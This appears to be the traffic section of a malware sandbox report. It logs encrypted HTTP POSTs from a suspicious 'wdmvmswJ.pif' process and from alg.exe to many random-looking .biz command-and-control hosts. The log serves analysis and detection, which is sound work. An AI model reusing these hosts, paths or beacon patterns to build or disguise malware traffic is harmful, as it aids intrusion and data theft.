                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        51192.168.2.849766172.234.222.143804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.357513905 CET350OUTPOST /fvthsigvq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.357542038 CET778OUTData Raw: 28 07 aa 71 b9 fa 18 8e fe 02 00 00 97 fa 93 93 07 41 60 a6 b9 59 30 f1 64 f9 24 b7 d2 7a 0a 9a f7 28 0f e0 89 15 e4 d8 ff 45 10 6d 21 74 0b 7d dd 52 32 1a 88 85 e2 bf 57 e3 5a 84 b8 a8 75 01 fa 39 d8 68 21 8c 7d c4 26 91 3f 5f 54 af 89 9e 24 b4
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (qA`Y0d$z(Em!t}R2WZu9h!}&?_T$~MJ!+fr3>Y^CY<O9cnN}SKT4y`=/5^{4XlX*Sq:,@@ZcX&WtK&oZTjO_(


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        52192.168.2.84976718.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.539400101 CET349OUTPOST /jftcpo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.539422989 CET802OUTData Raw: a5 5b 69 9b 23 a3 8b 8b 16 03 00 00 34 0d e9 b1 48 65 eb 8b 60 16 2c ab 27 53 0c e8 95 68 38 23 83 8e b8 48 7f 21 d0 fa cf 57 5c c2 43 9c 23 31 0f 99 20 f2 cd 3e 79 26 84 ed ad 12 ab a9 cf 8e 98 3d 32 49 1e 4d c9 e2 00 84 26 4f 28 c6 45 db fe 92
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [i#4He`,'Sh8#H!W\C#1 >y&=2IM&O(EmWFVempS&'izR4P[9kImpAv`~~eh]%bC)4A*+n,6h>jWbbw/\<(/LB


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        53192.168.2.84976818.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.073998928 CET356OUTPOST /jdfcrnyhggjio HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.074021101 CET802OUTData Raw: 1c ab fa 8c 06 f4 48 5e 16 03 00 00 c0 80 58 7a d4 51 21 12 b0 0a f2 dd 92 2c bf 0c 11 9d 2e 54 e0 37 57 03 dc fe 83 cb 57 87 3c 25 3a b1 6a 6f 49 0d 6a 1b 5a 62 87 4e 97 3d d0 d8 b4 60 69 f9 bc dc ee 86 1e 86 cc 47 9a b7 94 1d 60 1e b5 f5 b3 ec
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: H^XzQ!,.T7WW<%:joIjZbN=`iG`B"/BDEU95q~\Y\Xo(G*ugOE!:6;]!?'HQzHUh|7J*E\>KM}Z`=p}6-?NeydU>20uRl:
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.502891064 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=407903f0f946674c159f296360b00f86|173.254.250.82|1730445848|1730445848|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        54192.168.2.84976934.246.200.160804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.352500916 CET350OUTPOST /sarbnswr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.352538109 CET778OUTData Raw: 49 09 05 8c f4 77 ad fb fe 02 00 00 fc 85 a2 36 48 eb 41 2c 9c d9 0a a2 37 24 eb c9 b8 5a 06 7b 09 67 b3 b3 d2 47 ef 72 f2 e8 f5 66 a2 2e b4 be c0 26 ed e9 c3 68 57 3d 99 ab d5 33 dc d6 e4 c6 f0 ac d0 7d a9 8e 6e 06 da 50 15 1d d0 cc 31 55 56 6e
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Iw6HA,7$Z{gGrf.&hW=3}nP1UVn)GmW*Oq/BY^sfw:^YClLdAlA6eK|KkDvQDV_+ KT.<5t`,vLH
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.313596010 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3fe9daa3301784027e9d719ac360c0ca|173.254.250.82|1730445848|1730445848|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        55192.168.2.84977018.208.156.248804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.481409073 CET352OUTPOST /nhxpdndgorr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.481442928 CET778OUTData Raw: 1f 6f c6 5c 7a 6a f0 d0 fe 02 00 00 33 79 a9 c7 8d df d7 06 e8 0d 9a 54 b6 95 e2 88 06 81 a6 61 04 04 f4 c6 20 e8 9b 99 b2 c8 71 16 61 0f a3 37 b2 05 ba 8f a9 cc 85 42 d0 ab 67 67 5a 02 eb de 8b 87 4d f4 a5 14 45 ab d4 90 88 e8 33 d7 a0 15 93 93
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: o\zj3yTa qa7BggZME3UKdv[ti99N(di_S@(e=Mn.A$3pzhTO/YUy&/2IShP^3CY%cPdKs[@-|l+`1Jy
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.148029089 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b0e71286991e06c9cd3317506d9052ef|173.254.250.82|1730445849|1730445849|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        56192.168.2.84977118.208.156.248804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.528558969 CET345OUTPOST /mxlx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.528584957 CET802OUTData Raw: 87 d3 33 fb dd b8 14 ea 16 03 00 00 3a 2f 13 ad 8f e7 4f 6e 86 47 e6 b1 53 e1 48 d4 91 93 3e 0f 1a c9 8a ec 4a ca 4d 81 b6 7e 4b c7 7d 91 8d f9 27 a9 ef fb d3 23 ce 8b 1b 22 0d 06 fc 50 22 f3 e6 ff 8b a6 1c c2 35 36 67 42 9a e4 31 50 ac 9c d2 24
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3:/OnGSH>JM~K}'#"P"56gB1P$}z-*c/{dgaQ"^0X"$rnw'gN"$jRo.T$} sTXuF4~!A0U]I/<XXUYUt8/JP+F{`a
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.217323065 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5b84c012568663f237b656c2850a3fec|173.254.250.82|1730445849|1730445849|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        57192.168.2.84977244.221.84.105804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.281198978 CET347OUTPOST /bss HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.281239033 CET802OUTData Raw: 72 6b 04 e1 bf 75 4f 04 16 03 00 00 74 65 bc b9 88 12 1f 16 0b b0 c4 90 ce 01 c0 6b 3a 2f d3 89 98 c6 07 cc 68 b3 47 6c 6a 0d 6e c8 a3 f4 17 67 8e 26 c2 78 6b 6f 4c 1c ea 40 aa 4b 23 4d f4 b2 3a 6a d8 4b d5 a6 7f c6 d2 c5 73 3e ba 7e a9 c5 39 ef
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: rkuOtek:/hGljng&xkoL@K#M:jKs>~9q<R3(>67u(Cmi6w>8qwi7f\)rX1A,4]\9WL\=>&o{=+SB4(*v/kX'6.K4A?
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.944010019 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b779c41a7e24b48a06f6b4753b8df14d|173.254.250.82|1730445849|1730445849|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        58192.168.2.849773208.100.26.245804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.329936981 CET355OUTPOST /hckdbdnsiwd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.329952002 CET778OUTData Raw: 2e fe 14 f8 c7 14 6e 4e fe 02 00 00 2d 1f 92 02 49 62 78 36 d0 a9 ae 08 e1 0b f2 23 cf 38 97 81 27 45 97 8e da e5 fc a4 9e 70 4a a6 a7 a9 a7 b8 32 02 cd 2d f9 1f b6 ea 79 d2 82 ce 9f 8c a7 bc a3 b8 ec 95 0c 3b 5b 60 af 59 25 cd fa e1 55 5f 51 17
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .nN-Ibx6#8'EpJ2-y;[`Y%U_Q_#9+v*{Cp@=]$jD?C+-cX;U0AZ%-Dn3Wkd|i^Drt8kzFmv)ScqJ'qYJg
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.965711117 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.000356913 CET346OUTPOST /bh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.000401020 CET778OUTData Raw: c1 8f 87 2b 89 bf 9d 36 fe 02 00 00 7d 77 66 f6 bf dd ce 76 14 f3 4b e0 05 cf dd c3 10 9d 40 e8 0c 02 6c ef 91 99 a8 c7 f0 79 18 f5 c1 6f 96 89 8b 46 b8 0a 21 89 39 98 3f 06 32 7e 6c 3a c2 64 e2 c6 17 d4 a8 9c a9 37 20 5c bc 77 f5 7f 89 d5 59 8a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +6}wfvK@lyoF!9?2~l:d7 \wYeMgv<gegjl{]0`=b=d9_Bk1B%Qdw"&&%wYd*;UV!#p{$^xb,Zn\s6(wUK8X&0jja=
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.146083117 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        59192.168.2.84977418.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.005709887 CET353OUTPOST /dtupajxvn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.005726099 CET802OUTData Raw: fc 1b 3a d7 bd c4 b5 44 16 03 00 00 95 0e b3 eb d0 05 61 57 18 5d a8 76 6f 71 29 4f 70 47 41 00 ca f8 e8 a7 14 64 47 91 79 9f da 34 cc 23 d3 cd 55 a3 8d 04 99 58 74 bb 41 09 c4 6b 23 0e 22 21 30 68 db f0 76 52 26 f7 c9 43 0b e2 02 8b a1 15 52 47
